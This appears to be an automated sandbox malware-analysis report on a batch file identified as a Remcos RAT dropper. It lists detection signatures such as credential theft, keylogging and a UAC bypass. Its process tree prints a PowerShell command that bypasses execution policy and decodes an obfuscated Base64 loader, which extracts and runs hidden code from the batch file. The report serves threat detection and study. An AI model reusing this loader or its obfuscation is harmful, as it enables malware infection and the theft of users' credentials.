Windows
Analysis Report
z310517827.bat
Overview
General Information
Detection
Batch Injector, Remcos
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7816 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\z3105 17827.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7896 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\z31051 7827.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7976 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('DQoNCiR zY3JpcHRDb 250ZW50ID0 gQCcNCiR1c 2Vya2xyZ3J OYW1lIGtsc mdyPSAkZW5 rbHJncnY6V VNFa2xyZ3J STkFNRWtsc mdyOyRqbWR rbHJncm9tI D0ga2xyZ3I iQzpcVWtsc mdyc2Vyc1x rbHJnciR1c 2Vya2xyZ3J OYW1lXGtsc mdyZHdtLmJ rbHJncmF0I jtpa2xyZ3J mIChUZWtsc mdyc3QtUGF rbHJncnRoI CRqa2xyZ3J tZG9tKWtsc mdyIHsgICB rbHJnciBXc ml0a2xyZ3J lLUhvc2tsc mdydCAiQmF rbHJncnRja CBma2xyZ3J pbGUgZmtsc mdyb3VuZDp rbHJnciAka m1ka2xyZ3J vbSIgLWtsc mdyRm9yZWd rbHJncnJvd W5ka2xyZ3J Db2xvcmtsc mdyIEN5YW5 rbHJncjsgI CAga2xyZ3I kZmlsZWtsc mdyTGluZXN rbHJnciA9I FtTa2xyZ3J 5c3RlbWtsc mdyLklPLkZ rbHJncmlsZ V06a2xyZ3I 6UmVhZGtsc mdyQWxsTGl rbHJncm5lc ygka2xyZ3J qbWRvbWtsc mdyLCBbU3l rbHJncnN0Z W0ua2xyZ3J UZXh0Lmtsc mdyRW5jb2R rbHJncmluZ 106a2xyZ3I 6VVRGOGtsc mdyKTsgICB rbHJnciBmb 3Jla2xyZ3J hY2ggKGtsc mdyJGxpbmV rbHJnciBpb iAka2xyZ3J maWxlTGtsc mdyaW5lcyl rbHJnciB7I CAga2xyZ3I gICAgIGtsc mdyaWYgKCR rbHJncmxpb mUga2xyZ3I tbWF0Y2tsc mdyaCAnXjp rbHJncjo6I D8oa2xyZ3I uKykkJ2tsc mdyKSB7ICB rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdyV3JpdGV rbHJnci1Ib 3N0a2xyZ3I gIkluamtsc mdyZWN0aW9 rbHJncm4gY 29ka2xyZ3J lIGRldGtsc mdyZWN0ZWR rbHJnciBpb iB0a2xyZ3J oZSBiYWtsc mdydGNoIGZ rbHJncmlsZ S4ia2xyZ3I gLUZvcmtsc mdyZWdyb3V rbHJncm5kQ 29sa2xyZ3J vciBDeWtsc mdyYW47ICB rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdydHJ5IHt rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdyICAgICB rbHJnciAkZ GVja2xyZ3J vZGVkQmtsc mdyeXRlcyB rbHJncj0gW 1N5a2xyZ3J zdGVtLmtsc mdyQ29udmV rbHJncnJ0X To6a2xyZ3J Gcm9tQmtsc mdyYXNlNjR rbHJnclN0c mlua2xyZ3J nKCRtYWtsc mdydGNoZXN rbHJnclsxX S5Ua2xyZ3J yaW0oKWtsc mdyKTsgICB rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdyICAgJGl rbHJncm5qZ WN0a2xyZ3J pb25Db2tsc mdyZGUgPSB rbHJncltTe XN0a2xyZ3J lbS5UZWtsc mdyeHQuRW5 rbHJncmNvZ Glua2xyZ3J nXTo6VWtsc mdybmljb2R rbHJncmUuR 2V0a2xyZ3J TdHJpbmtsc mdyZygkZGV rbHJncmNvZ GVka2xyZ3J CeXRlc2tsc mdyKTsgICB rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdyICAgV3J rbHJncml0Z S1Ia2xyZ3J vc3QgImtsc mdySW5qZWN rbHJncnRpb 24ga2xyZ3J jb2RlIGtsc mdyZGVjb2R rbHJncmVkI HN1a2xyZ3J jY2Vzc2tsc mdyZnVsbHl rbHJnci4iI C1Ga2xyZ3J vcmVncmtsc mdyb3VuZEN rbHJncm9sb 3Iga2xyZ3J HcmVlbmtsc mdyOyAgICB rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdyICBXcml rbHJncnRlL Uhva2xyZ3J zdCAiRWtsc mdyeGVjdXR rbHJncmluZ yBpa2xyZ3J uamVjdGtsc mdyaW9uIGN rbHJncm9kZ S4ua2xyZ3I uIiAtRmtsc mdyb3JlZ3J rbHJncm91b mRDa2xyZ3J vbG9yIGtsc mdyWWVsbG9 rbHJncnc7I CAga2xyZ3I gICAgIGtsc mdyICAgICB rbHJnciAgI Elua2xyZ3J 2b2tlLWtsc mdyRXhwcmV rbHJncnNza W9ua2xyZ3I gJGluamtsc mdyZWN0aW9 rbHJncm5Db 2Rla2xyZ3I 7ICAgIGtsc mdyICAgICB rbHJnciAgI CAga2xyZ3I gIGJyZWtsc mdyYWs7ICB rbHJnciAgI CAga2xyZ3I gICAgIGtsc mdyfSBjYXR